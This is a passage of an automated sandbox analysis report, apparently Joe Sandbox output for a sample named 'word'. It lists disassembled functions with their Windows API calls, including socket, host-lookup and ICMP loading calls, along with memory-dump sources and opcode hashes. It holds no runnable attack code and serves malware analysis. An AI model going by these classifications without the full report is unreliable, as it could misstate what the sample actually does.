                                                                            • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                            Function 00450D00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                            • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                            • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                            • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                            Function 0046BD4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                            • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                            • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                            • String ID: HH
                                                                            • API String ID: 1515696956-2761332787
                                                                            • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                            • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                            • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                            • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                            Function 004497A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                            • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                            • SetMenuItemInfoW.USER32 ref: 00449817
                                                                            • DrawMenuBar.USER32(?,?,00000000,?), ref: 00449828
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$InfoItem$Draw_malloc
                                                                            • String ID: 0
                                                                            • API String ID: 772068139-4108050209
                                                                            • Opcode ID: f9e456d65f37a3d64cb432bc1a1f977de8c9fc5d92ba122409fca0b229618a80
                                                                            • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                            • Opcode Fuzzy Hash: f9e456d65f37a3d64cb432bc1a1f977de8c9fc5d92ba122409fca0b229618a80
                                                                            • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                            Function 0044A362 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0044A37C
                                                                            • GetFocus.USER32 ref: 0044A384
                                                                            • SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FocusForegroundMessageSendWindow
                                                                            • String ID: X+
                                                                            • API String ID: 944890605-1938338529
                                                                            • Opcode ID: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
                                                                            • Instruction ID: c96dbd3af6c5a13cf066609db195d3b9a892d089c32e0a7510d993dcc5c4d347
                                                                            • Opcode Fuzzy Hash: 90726ff0006992839abc6d27306098825af4dbfcbad5bf8d3aa395912d22fe36
                                                                            • Instruction Fuzzy Hash: F1112F351802419BC7208F28D849EA77B71EB8A720F18065DFC4187391EB785893CB59
                                                                            Function 0044A37A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 0044A37C
                                                                            • GetFocus.USER32 ref: 0044A384
                                                                            • SendMessageW.USER32(?,000000B0,-000001B0,000001B4), ref: 0044A3F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: FocusForegroundMessageSendWindow
                                                                            • String ID: X+
                                                                            • API String ID: 944890605-1938338529
                                                                            • Opcode ID: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
                                                                            • Instruction ID: 22bd45665fc9576d9632a8de694c1cf6a1f999350c1115eace43a942eb161fba
                                                                            • Opcode Fuzzy Hash: 55901db6c8d2e617757f75f6a9cc8ea1ad95b679d72c4375ee8970e73f0fc9c0
                                                                            • Instruction Fuzzy Hash: DF0188345402019BD7209F28D848A6B7B61EB8A724F28466EFC14973E1EB796892CB59
                                                                            Function 004342A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AllocTask_wcslen
                                                                            • String ID: hkG
                                                                            • API String ID: 2651040394-3610518997
                                                                            • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                            • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                            • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                            • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                            Function 0043416A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                            • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                            • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                            • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                            Function 004343CE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004343DE
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                            • API String ID: 2574300362-58917771
                                                                            • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                            • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                            • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                            • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                            Function 004343FD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043440D
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                            • API String ID: 2574300362-3530519716
                                                                            • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                            • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                            • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                            • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                            Function 0043442C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0043443C
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                            • API String ID: 2574300362-275556492
                                                                            • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                            • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                            • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                            • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                            Function 0040EE70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EE7B
                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                            • API String ID: 2574300362-3024904723
                                                                            • Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                            • Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
                                                                            • Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
                                                                            • Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
                                                                            Function 0040EEE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040EEEB
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040EEFD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                            • Instruction ID: 788ba9bdae5bc0ddad915f4d08bdcf590d5e3b2ea1e3da194f5c7121584c3133
                                                                            • Opcode Fuzzy Hash: 58ac1dddc1eea1967b9e3df612208a50857473a21dbb81c427901d39c1ebcba1
                                                                            • Instruction Fuzzy Hash: ABD0C9B0944703AAC7311F72C91C70A7AE4AB40341F204C3EB996E1691DBBCC0508B2C
                                                                            Function 0040ACA0 Relevance: 6.4, APIs: 4, Instructions: 368COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 05dd77c4c4e1e7f773cce1883d0b5346e5ce6ea378ee5ed9da1d6d56ea86f387
                                                                            • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                            • Opcode Fuzzy Hash: 05dd77c4c4e1e7f773cce1883d0b5346e5ce6ea378ee5ed9da1d6d56ea86f387
                                                                            • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                            Function 0041456C Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __flush.LIBCMT ref: 00414630
                                                                            • __fileno.LIBCMT ref: 00414650
                                                                            • __locking.LIBCMT ref: 00414657
                                                                            • __flsbuf.LIBCMT ref: 00414682
                                                                              • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                              • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                            • String ID:
                                                                            • API String ID: 3240763771-0
                                                                            • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                            • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                            • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                            • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                            Function 004781AE Relevance: 6.1, APIs: 4, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                            • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                            • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: CopyVariant$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 2286883814-0
                                                                            • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                            • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                            • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                            • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                            Function 0047404B Relevance: 6.1, APIs: 4, Instructions: 133networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                            • #21.WSOCK32 ref: 004740E0
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.429618420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.429614377.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429632624.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.429642392.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$socket
                                                                            • String ID:
                                                                            • API String ID: 1881357543-0
                                                                            • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                            • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                            • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                            • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                            Function 0042384A Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                            • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
